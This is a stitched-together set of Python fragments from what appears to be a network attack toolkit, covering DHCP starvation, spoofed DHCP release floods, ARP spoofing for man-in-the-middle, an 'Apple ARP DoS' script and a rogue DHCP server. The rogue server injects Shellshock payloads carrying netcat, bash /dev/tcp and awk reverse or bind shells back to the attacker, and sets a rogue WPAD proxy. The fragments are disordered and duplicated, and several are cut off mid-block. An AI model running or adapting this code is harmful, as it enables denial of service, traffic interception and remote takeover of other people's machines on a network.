def send_dhcp_request(request):
global _start_time
global _ack_received
if request.haslayer(DHCP):
xid = request[BOOTP].xid
yiaddr = request[BOOTP].yiaddr
siaddr = request[BOOTP].siaddr
_start_time = time()
if request[DHCP].options[0][1] == 2:
if args.find_dhcp:
print Base.c_success + "DHCP srv IP: " + Base.cSUCCESS + siaddr + Base.cEND
print Base.c_success + "DHCP srv MAC: " + Base.cSUCCESS + \
Base.get_mac(_current_network_interface, siaddr) + Base.cEND
pprint(request[DHCP].options)
exit(0)
print Base.c_info + "OFFER from: " + Base.cINFO + siaddr + Base.cEND + " your client ip: " + \
Base.cINFO + yiaddr + Base.cEND
try:
if args.not_send_hostname:
host_name = None
else:
host_name = Base.make_random_string(8)
dhcp = DHCP_raw()
request_packet = dhcp.make_request_packet(
source_mac=_current_mac_address,
client_mac=_transactions[xid],
transaction_id=xid,
dhcp_message_type=3,
host_name=host_name,
requested_ip=yiaddr,
option_value=_dhcp_option_value,
option_code=_dhcp_option_code,
relay_agent_ip=_current_ip_address)
sendp(request_packet,
iface=_current_network_interface,
verbose=False)
except KeyError:
print Base.c_error + "Key error, this transaction id: " + hex(
xid) + " not found in our transactions!"
except:
print Base.c_error + "Unknown error!"
if request[DHCP].options[0][1] == 5:
_ack_received = True
print Base.c_success + "ACK from: " + Base.cSUCCESS + siaddr + Base.cEND + " your client ip: " + \
Base.cSUCCESS + yiaddr + Base.cEND
if request[DHCP].options[0][1] == 6:
print Base.c_error + "NAK from: " + Base.cERROR + siaddr + Base.cEND + " your client ip: " + \
Base.cERROR + yiaddr + Base.cEND
def send_dhcp_discover():
sleep(1)
eth = Ethernet_raw()
dhcp = DHCP_raw()
Base.print_info("Sending discover packets...")
Base.print_info("Delay between DISCOVER packets: ", str(args.delay),
" sec.")
Base.print_info("Start sending packets: ",
str(datetime.now().strftime("%Y/%m/%d %H:%M:%S")))
discover_raw_socket = socket(AF_PACKET, SOCK_RAW)
discover_raw_socket.bind((listen_network_interface, 0))
try:
while True:
client_mac = eth.get_random_mac()
transaction_id = randint(1, 4294967295)
discover_packet = dhcp.make_request_packet(
source_mac=your_mac_address,
client_mac=client_mac,
transaction_id=transaction_id,
dhcp_message_type=1,
host_name=None,
requested_ip=None,
option_value=dhcp_option_value,
option_code=dhcp_option_code,
relay_agent_ip=your_ip_address)
discover_raw_socket.send(discover_packet)
transactions[transaction_id] = client_mac
if int(time() - start_time) > args.timeout:
if ack_received:
Base.print_success(
"IP address pool is exhausted: ",
str(datetime.now().strftime("%Y/%m/%d %H:%M:%S")))
else:
Base.print_error("DHCP Starvation failed timeout!")
sleep(1)
exit(1)
sleep(int(args.delay))
except KeyboardInterrupt:
Base.print_info("Exit")
discover_raw_socket.close()
exit(0)
def send_dhcp_discover():
sleep(1)
eth = Ethernet_raw()
dhcp = DHCP_raw()
print Base.c_info + "Sending discover packets..."
print Base.c_info + "Delay between DISCOVER packets: " + Base.cINFO + str(
args.delay) + " sec." + Base.cEND
print Base.c_info + "Start sending packets: " + Base.cINFO + str(datetime.now().strftime("%Y/%m/%d %H:%M:%S")) + \
Base.cEND
while True:
client_mac = eth.get_random_mac()
transaction_id = randint(1, 4294967295)
discover_packet = dhcp.make_request_packet(
source_mac=_current_mac_address,
client_mac=client_mac,
transaction_id=transaction_id,
dhcp_message_type=1,
host_name=None,
requested_ip=None,
option_value=_dhcp_option_value,
option_code=_dhcp_option_code,
relay_agent_ip=_current_ip_address)
sendp(discover_packet, iface=_current_network_interface, verbose=False)
_transactions[transaction_id] = client_mac
if int(time() - _start_time) > args.timeout:
if _ack_received:
print Base.c_success + "IP address pool is exhausted: " + Base.cSUCCESS + \
str(datetime.now().strftime("%Y/%m/%d %H:%M:%S")) + Base.cEND
else:
print Base.c_error + "DHCP Starvation failed!"
system('kill -9 ' + str(getpid()))
sleep(int(args.delay))
parser = ArgumentParser(description='DHCP Release raw packet sender')
parser.add_argument('-i', '--interface', help='Set interface name for send discover packets')
parser.add_argument('-c', '--client_ip', type=str, required=True, help='Set client IP address')
parser.add_argument('-m', '--client_mac', type=str, help='Set client MAC address', default=None)
parser.add_argument('-s', '--server_ip', type=str, required=True, help='Set DHCP server IP address')
parser.add_argument('-n', '--number', type=int, default=100, help='Set number of packets; default=100')
parser.add_argument('-d', '--delay', type=int, default=1, help='Set delay; default=1')
args = parser.parse_args()
current_network_interface = ""
if args.interface is None:
current_network_interface = Base.netiface_selection()
else:
current_network_interface = args.interface
server_mac = Base.get_mac(current_network_interface, args.server_ip)
if args.client_mac is None:
client_mac = Base.get_mac(current_network_interface, args.client_ip)
else:
client_mac = args.client_mac
dhcp = DHCP_raw()
index = 0
while index < args.number:
release_packet = dhcp.make_release_packet(client_mac=client_mac, server_mac=server_mac,
client_ip=args.client_ip, server_ip=args.server_ip)
sendp(release_packet, iface=current_network_interface, verbose=True)
sleep(args.delay)
index += 1
print "This network interface does not have mac address!"
exit(1)
count = 0
count_max = int(args.packets)
index_percent = 0
count_percent = 0
print "Creating packets..."
if args.notspoofmac:
print " Your MAC address is not spoofed!"
eth = Ethernet_raw()
dhcp = DHCP_raw()
while count < count_max:
if args.notspoofmac:
SRC_MAC = current_mac_address
else:
SRC_MAC = eth.get_mac_for_dhcp_discover()
CLIENT_MAC = eth.get_random_mac()
HOST_NAME = Base.make_random_string(8)
current_packet = dhcp.make_discover_packet(SRC_MAC, CLIENT_MAC,
HOST_NAME)
PACKETS.append(current_packet)
from base import Base
from network import Ethernet_raw, IP_raw, UDP_raw, DHCP_raw
Base.check_platform()
Base.check_user()
Base.netiface_selection()
eth = Ethernet_raw()
ip = IP_raw()
udp = UDP_raw()
dhcp = DHCP_raw()
print eth.get_random_mac()
print ":".join("{:02x}".format(ord(c)) for c in eth.make_header("aa:aa:aa:aa:aa:aa", "bb:bb:bb:bb:bb:bb", 2048))
print ip.get_random_ip()
print ":".join("{:02x}".format(ord(c)) for c in ip.make_header("127.0.0.1", "127.0.0.1", 0, 8, 1))
print ":".join("{:02x}".format(ord(c)) for c in udp.make_header(12345, 53, 0))
print ":".join("{:02x}".format(ord(c)) for c in dhcp.make_discover_packet("aa:aa:aa:aa:aa:aa", "bb:bb:bb:bb:bb:bb",
"10.10.10.10", "test"))
help='Minimal output')
args = parser.parse_args()
# endregion
# region Print banner if argument quit is not set
if not args.quiet:
Base.print_banner()
# endregion
# region Set global variables
eth = Ethernet_raw()
arp = ARP_raw()
ip = IP_raw()
udp = UDP_raw()
dhcp = DHCP_raw()
target_mac_address = str(args.target_mac).lower()
target_ip_address = str(args.target_ip)
transaction_id_global = 0
requested_ip = None
print_possible_mitm = False
print_success_mitm = False
# endregion
# region Get your network settings
if args.interface is None:
Base.print_warning(
"Please set a network interface for sniffing ARP and DHCP requests ..."
)
current_network_interface = Base.netiface_selection(args.interface)
from argparse import ArgumentParser
from ipaddress import IPv4Address
from socket import socket, AF_PACKET, SOCK_RAW, htons
from time import sleep
# endregion
# region Check user, platform and print banner
Base = Base()
Scanner = Scanner()
ArpScan = ArpScan()
eth = Ethernet_raw()
arp = ARP_raw()
ip = IP_raw()
udp = UDP_raw()
dhcp = DHCP_raw()
Base.check_user()
Base.check_platform()
Base.print_banner()
# endregion
# region Parse script arguments
parser = ArgumentParser(description='Apple ARP DoS script')
parser.add_argument('-i',
'--iface',
type=str,
help='Set interface name for send ARP packets')
parser.add_argument('-t',
'--target_ip',
type=str,
def dhcp_reply(request):
global offer_ip_address
global target_mac_address
global target_ip_address
global number_of_dhcp_request
global shellshock_url
global domain
global your_mac_address
global current_network_interface
global arp_req_router
global arp_req_your_ip
global possible_output
global router_ip_address
SOCK = socket(AF_PACKET, SOCK_RAW)
SOCK.bind((current_network_interface, 0))
if request.haslayer(DHCP):
domain = bytes(args.domain)
offer_ip_address = args.first_offer_ip
transaction_id = request[BOOTP].xid
target_mac_address = ":".join("{:02x}".format(ord(c))
for c in request[BOOTP].chaddr[0:6])
if request[DHCP].options[0][1] == 1:
if target_ip_address is not None:
offer_ip_address = target_ip_address
else:
next_offer_ip_address = IPv4Address(
unicode(args.first_offer_ip)) + number_of_dhcp_request
if IPv4Address(next_offer_ip_address) < IPv4Address(
unicode(args.last_offer_ip)):
number_of_dhcp_request += 1
offer_ip_address = str(next_offer_ip_address)
else:
number_of_dhcp_request = 0
offer_ip_address = args.first_offer_ip
print Base.c_info + "DHCP DISCOVER from: " + target_mac_address + " transaction id: " + \
hex(transaction_id) + " offer ip: " + offer_ip_address
offer_packet = make_dhcp_offer_packet(transaction_id)
SOCK.send(offer_packet)
print Base.c_info + "Send offer response!"
if request[DHCP].options[0][1] == 8:
ciaddr = request[BOOTP].ciaddr
giaddr = request[BOOTP].giaddr
chaddr = request[BOOTP].chaddr
flags = request[BOOTP].flags
print Base.c_info + "DHCP INFORM from: " + target_mac_address + " transaction id: " + hex(transaction_id) + \
" client ip: " + ciaddr
option_operation = pack("!3B", 53, 1, 5) # DHCPACK operation
option_netmask = pack("!" "2B" "4s", 1, 4, inet_aton(network_mask))
domain = pack("!%ds" % (len(domain)), domain)
option_domain = pack("!2B", 15, len(domain)) + domain
option_router = pack("!"
"2B"
"4s", 3, 4, inet_aton(router_ip_address))
option_dns = pack("!"
"2B"
"4s", 6, 4, inet_aton(dns_server_ip_address))
option_server_id = pack(
"!"
"2B"
"4s", 54, 4,
inet_aton(dhcp_server_ip_address)) # Set server id
option_end = pack("B", 255)
dhcp_options = option_operation + option_server_id + option_netmask + option_domain + option_router + \
option_dns + option_end
dhcp = DHCP_raw()
ack_packet = dhcp.make_packet(
ethernet_src_mac=dhcp_server_mac_address,
ethernet_dst_mac=target_mac_address,
ip_src=dhcp_server_ip_address,
ip_dst=ciaddr,
udp_src_port=67,
udp_dst_port=68,
bootp_message_type=2,
bootp_transaction_id=transaction_id,
bootp_flags=int(flags),
bootp_client_ip=ciaddr,
bootp_your_client_ip="0.0.0.0",
bootp_next_server_ip="0.0.0.0",
bootp_relay_agent_ip=giaddr,
bootp_client_hw_address=target_mac_address,
dhcp_options=dhcp_options,
padding=18)
SOCK.send(ack_packet)
print Base.c_info + "Send inform ack response!"
if request[DHCP].options[0][1] == 3:
dhcpnak = False
requested_ip = offer_ip_address
for option in request[DHCP].options:
if option[0] == "requested_addr":
requested_ip = str(option[1])
print Base.c_info + "DHCP REQUEST from: " + target_mac_address + " transaction id: " + \
hex(transaction_id) + " requested ip: " + requested_ip
if args.cisco:
ack_packet = make_dhcp_ack_packet(transaction_id, requested_ip,
"ff:ff:ff:ff:ff:ff",
"255.255.255.255")
SOCK.send(ack_packet)
print Base.c_info + "Send ack response to Cisco device: " + target_mac_address
else:
if args.apple:
ack_packet = make_dhcp_ack_packet(transaction_id,
requested_ip)
SOCK.send(ack_packet)
print Base.c_info + "Send ack response Apple device: " + target_mac_address
else:
if target_ip_address is not None:
if requested_ip != target_ip_address:
nak_packet = make_dhcp_nak_packet(
transaction_id, requested_ip)
SOCK.send(nak_packet)
print Base.c_info + "Send nak response!"
dhcpnak = True
else:
if IPv4Address(unicode(requested_ip)) < IPv4Address(unicode(args.first_offer_ip)) \
or IPv4Address(unicode(requested_ip)) > IPv4Address(unicode(args.last_offer_ip)):
nak_packet = make_dhcp_nak_packet(
transaction_id, requested_ip)
SOCK.send(nak_packet)
print Base.c_info + "Send nak response!"
dhcpnak = True
if not dhcpnak:
net_settings = args.ip_path + "ip addr add " + requested_ip + \
"/" + str(IPAddress(network_mask).netmask_bits()) + " dev " + args.iface_name + ";"
global payload
if args.shellshock_command is not None:
payload = args.shellshock_command
if args.bind_shell:
payload = "awk 'BEGIN{s=\"/inet/tcp/" + str(args.bind_port) + \
"/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' &"
if args.nc_reverse_shell:
payload = "rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + \
your_ip_address + " " + str(args.reverse_port) + " >/tmp/f &"
if args.nce_reverse_shell:
payload = "/bin/nc -e /bin/sh " + your_ip_address + " " + str(
args.reverse_port) + " 2>&1 &"
if args.bash_reverse_shell:
payload = "/bin/bash -i >& /dev/tcp/" + your_ip_address + \
"/" + str(args.reverse_port) + " 0>&1 &"
if payload is not None:
if not args.without_network:
payload = net_settings + payload
if args.without_base64:
shellshock_url = "() { :" + "; }; " + payload
else:
payload = b64encode(payload)
shellshock_url = "() { :" + "; }; /bin/sh <(/usr/bin/base64 -d <<< " + payload + ")"
if shellshock_url is not None:
if len(shellshock_url) > 255:
print Base.c_error + "Len of command is very big! Current len: " + str(
len(shellshock_url))
shellshock_url = "A"
global proxy
if args.proxy is None:
proxy = bytes("http://" + dhcp_server_ip_address +
":8080/wpad.dat")
else:
proxy = bytes(args.proxy)
ack_packet = make_dhcp_ack_packet(
transaction_id, requested_ip)
SOCK.send(ack_packet)
print Base.c_info + "Send ack response!"
if request.haslayer(ARP):
if target_ip_address is not None:
if request[ARP].op == 1:
if request[Ether].dst == "ff:ff:ff:ff:ff:ff" and request[
ARP].hwdst == "00:00:00:00:00:00":
print Base.c_info + "ARP request src MAC: " + request[
ARP].hwsrc + " dst IP: " + request[ARP].pdst
if request[ARP].pdst != target_ip_address:
if not args.apple:
sendp(Ether(dst=request[ARP].hwsrc,
src=your_mac_address) /
ARP(hwsrc=your_mac_address,
psrc=request[ARP].pdst,
hwdst=request[ARP].hwsrc,
pdst=request[ARP].psrc,
op=2),
iface=current_network_interface,
verbose=False)
print Base.c_info + "Send ARP response!"
else:
arp_req_your_ip = True
if request[Ether].dst == "ff:ff:ff:ff:ff:ff" and request[
ARP].pdst == router_ip_address:
arp_req_router = True
if arp_req_router or arp_req_your_ip:
if not possible_output and not args.apple and not args.cisco:
try:
print Base.c_warning + "Possible MiTM! Target: " + Base.cWARNING + \
target_ip_address + " (" + target_mac_address + ")" + Base.cEND
possible_output = True
except:
pass
if arp_req_router and arp_req_your_ip:
if target_mac_address is not None and target_ip_address is not None:
print Base.c_success + "MiTM success! Target: " + Base.cSUCCESS + target_ip_address + \
" (" + target_mac_address + ")" + Base.cEND
if not args.not_exit:
SOCK.close()
exit(0)
SOCK.close()
def send_dhcp_request(request):
# region Global variables
global start_time
global ack_received
global transactions
global dhcp_server_ip
global dhcp_server_mac
global global_socket
# endregion
if 'DHCP' in request.keys():
# region Get reply transaction id, client ip
xid = request['BOOTP']['transaction-id']
yiaddr = request['BOOTP']['your-ip-address']
siaddr = request['BOOTP']['server-ip-address']
# endregion
# region Get DHCP server IP
if dhcp_server_ip is None:
if siaddr == "0.0.0.0":
dhcp_server_ip = request['IP']['source-ip']
else:
dhcp_server_ip = siaddr
dhcp_server_mac = request['Ethernet']['source']
# endregion
# region Rewrite start time
start_time = time()
# endregion
# region DHCP OFFER
if request['DHCP'][53] == 2:
if args.find_dhcp:
Base.print_success("DHCP server IP: ", dhcp_server_ip)
Base.print_success("DHCP server MAC: ", dhcp_server_mac)
Base.print_success("DHCP packet: ")
print(dumps(request, indent=4))
exit(0)
Base.print_info("OFFER from: ", dhcp_server_ip,
" your client ip: ", yiaddr)
try:
if args.not_send_hostname:
host_name = None
else:
host_name = Base.make_random_string(8)
dhcp = DHCP_raw()
request_packet = dhcp.make_request_packet(
source_mac=your_mac_address,
client_mac=transactions[xid],
transaction_id=xid,
dhcp_message_type=3,
host_name=host_name,
requested_ip=yiaddr,
option_value=dhcp_option_value,
option_code=dhcp_option_code,
relay_agent_ip=your_ip_address)
global_socket.send(request_packet)
except KeyError:
Base.print_error("Key error, this transaction id: ", hex(xid),
" not found in our transactions!")
except:
Base.print_error("Unknown error!")
# endregion
# region DHCP ACK
if request['DHCP'][53] == 5:
ack_received = True
Base.print_info("ACK from: ", dhcp_server_ip,
" your client ip: ", yiaddr)
# endregion
# region DHCP NAK
if request['DHCP'][53] == 6:
Base.print_error("NAK from: ", dhcp_server_ip,
" your client ip: ", yiaddr)